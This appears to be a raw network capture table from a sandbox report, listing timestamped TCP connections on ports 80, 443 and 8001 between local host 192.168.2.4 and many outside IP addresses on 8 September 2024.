                                                                                                                                                                                                            Sep 8, 2024 08:59:31.878287077 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.878364086 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.880526066 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.880536079 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.880769014 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.880814075 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.881213903 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:31.924500942 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685209036 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685247898 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685281038 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685286045 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685303926 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685313940 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685313940 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685359001 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685373068 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685446024 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685606956 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685728073 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685741901 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685751915 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685758114 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685792923 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:47.059973001 CEST8055329154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:47.060040951 CEST5532980192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.959929943 CEST80015536247.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.960167885 CEST553628001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.960167885 CEST553628001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.962636948 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.965030909 CEST80015536247.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.967492104 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.350522995 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.350600958 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.352021933 CEST553788001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.356844902 CEST80015537847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.356951952 CEST553788001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.357110977 CEST553788001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.361835957 CEST80015537847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:54.163650990 CEST80553203.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:54.163721085 CEST5532080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 08:59:54.404510021 CEST80553303.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:54.404644966 CEST5533080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.327996016 CEST80015537847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.328121901 CEST553788001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.383207083 CEST5150780192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.388052940 CEST805150764.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.388145924 CEST5150780192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.401706934 CEST5150780192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.406558990 CEST805150764.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.689893007 CEST5150880192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.961282969 CEST5150980192.168.2.415.197.240.20
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.964636087 CEST805150844.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.964701891 CEST5150880192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.964843988 CEST5150880192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.966308117 CEST805150915.197.240.20192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.966367960 CEST5150980192.168.2.415.197.240.20
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.966459990 CEST5150980192.168.2.415.197.240.20
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.968599081 CEST5151080192.168.2.4103.224.182.252
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.969635010 CEST805150844.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.971277952 CEST805150915.197.240.20192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.973539114 CEST8051510103.224.182.252192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.973615885 CEST5151080192.168.2.4103.224.182.252
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.973776102 CEST5151080192.168.2.4103.224.182.252
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.975564957 CEST5151180192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.978594065 CEST8051510103.224.182.252192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.980423927 CEST8051511154.85.183.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.980489016 CEST5151180192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.980659008 CEST5151180192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.985483885 CEST8051511154.85.183.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.985793114 CEST5151280192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.990638971 CEST8051512103.224.212.108192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.990678072 CEST805150764.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.990706921 CEST5151280192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.990734100 CEST5150780192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.990817070 CEST5151280192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.995567083 CEST8051512103.224.212.108192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.467156887 CEST805150844.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.467190027 CEST805150844.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.467202902 CEST805150915.197.240.20192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.467266083 CEST5150880192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.467281103 CEST5150980192.168.2.415.197.240.20
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.469708920 CEST5150880192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.474525928 CEST805150844.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.579420090 CEST8051512103.224.212.108192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.579444885 CEST8051512103.224.212.108192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.579474926 CEST5151280192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.579520941 CEST5151280192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.581685066 CEST5151280192.168.2.4103.224.212.108
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.586472034 CEST8051512103.224.212.108192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.594935894 CEST8051510103.224.182.252192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.594957113 CEST8051510103.224.182.252192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.594988108 CEST5151080192.168.2.4103.224.182.252
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.595022917 CEST5151080192.168.2.4103.224.182.252
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.597089052 CEST5151080192.168.2.4103.224.182.252
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.601977110 CEST8051510103.224.182.252192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.806605101 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.811794043 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.811888933 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.812057972 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.816817045 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.848315001 CEST8051511154.85.183.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.848385096 CEST5151180192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.849725008 CEST5151180192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.854554892 CEST8051511154.85.183.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.936137915 CEST5151480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.941639900 CEST8051514199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.941704988 CEST5151480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.941899061 CEST5151480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.948060989 CEST8051514199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.262165070 CEST8051511154.85.183.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.262224913 CEST5151180192.168.2.4154.85.183.50
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.405836105 CEST8051514199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.405858040 CEST8051514199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.405919075 CEST5151480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507297993 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507324934 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507343054 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507354021 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507364988 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507375956 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507386923 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507392883 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507433891 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507452011 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507463932 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507474899 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.507514000 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.512387991 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.512420893 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.512439966 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.512490988 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604511976 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604530096 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604548931 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604561090 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604574919 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604573011 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604594946 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604609013 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604609966 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604621887 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.604645014 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.605321884 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.605369091 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.605381012 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.605396986 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.605428934 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.605449915 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.749694109 CEST5151580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.754502058 CEST805151572.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.755820036 CEST5151580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.756098986 CEST5151580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.761060953 CEST805151572.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.841217041 CEST5151680192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.846127033 CEST805151664.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.846194983 CEST5151680192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.846344948 CEST5151680192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.851166964 CEST805151664.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.252748966 CEST805151572.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.252851009 CEST5151580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.252955914 CEST5151580192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.257807016 CEST805151572.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.258060932 CEST5151780192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.262866974 CEST805151772.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.262924910 CEST5151780192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.263072014 CEST5151780192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.267832041 CEST805151772.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.448872089 CEST805151664.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.448934078 CEST5151680192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.763622046 CEST805151772.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.763688087 CEST5151780192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.763802052 CEST5151780192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.768584967 CEST805151772.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.164859056 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.164941072 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.530431032 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535259962 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535481930 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535590887 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.540580988 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.162983894 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.163038015 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.163048983 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.163069010 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.163115025 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164383888 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164449930 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164519072 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164828062 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164886951 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164935112 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.165016890 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.165107965 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.165167093 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.166635036 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.171919107 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.176911116 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.689388037 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.694294930 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.694354057 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.694504976 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.699639082 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190821886 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190855026 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190888882 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190933943 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.197607994 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.202339888 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.405204058 CEST8051514199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.405282021 CEST5151480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.873377085 CEST6126080192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878151894 CEST8061260199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878226042 CEST6126080192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878705025 CEST6126080192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.883493900 CEST8061260199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.910095930 CEST5532080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.910410881 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.914943933 CEST80553203.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915203094 CEST80612613.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915282011 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915395021 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.920135975 CEST80612613.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.122426033 CEST5404280192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.127327919 CEST805404269.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.127412081 CEST5404280192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.127598047 CEST5404280192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.128834963 CEST4973280192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.129108906 CEST5404380192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.129498959 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.129700899 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.129861116 CEST5533080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.130038023 CEST5404580192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.133497953 CEST805404269.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.133923054 CEST8049732188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.133991003 CEST8054043188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134002924 CEST4973280192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134174109 CEST5404380192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134511948 CEST8054044208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134562969 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134691954 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134742975 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134757042 CEST80553303.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134788990 CEST80540453.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134843111 CEST5404580192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.136521101 CEST5404680192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.141314983 CEST805404623.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.142378092 CEST5404680192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.142412901 CEST5404680192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.147404909 CEST805404623.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205440998 CEST5404380192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205537081 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205620050 CEST5404580192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205734015 CEST5532980192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205997944 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210264921 CEST8054043188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210372925 CEST8054044208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210607052 CEST80540453.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210618973 CEST8055329154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210727930 CEST8054047154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210803986 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.215039015 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.219912052 CEST8054047154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.243084908 CEST5404880192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.248399973 CEST8054048178.162.203.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.248462915 CEST5404880192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.248603106 CEST5404880192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.254453897 CEST8054048178.162.203.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599822044 CEST80612613.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599864006 CEST805404623.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599890947 CEST805404623.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599904060 CEST8054044208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599931955 CEST5404680192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599941015 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599963903 CEST805404269.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599965096 CEST5404680192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599987030 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600039959 CEST805404269.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600050926 CEST805404623.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600061893 CEST805404269.162.80.62192.168.2.4
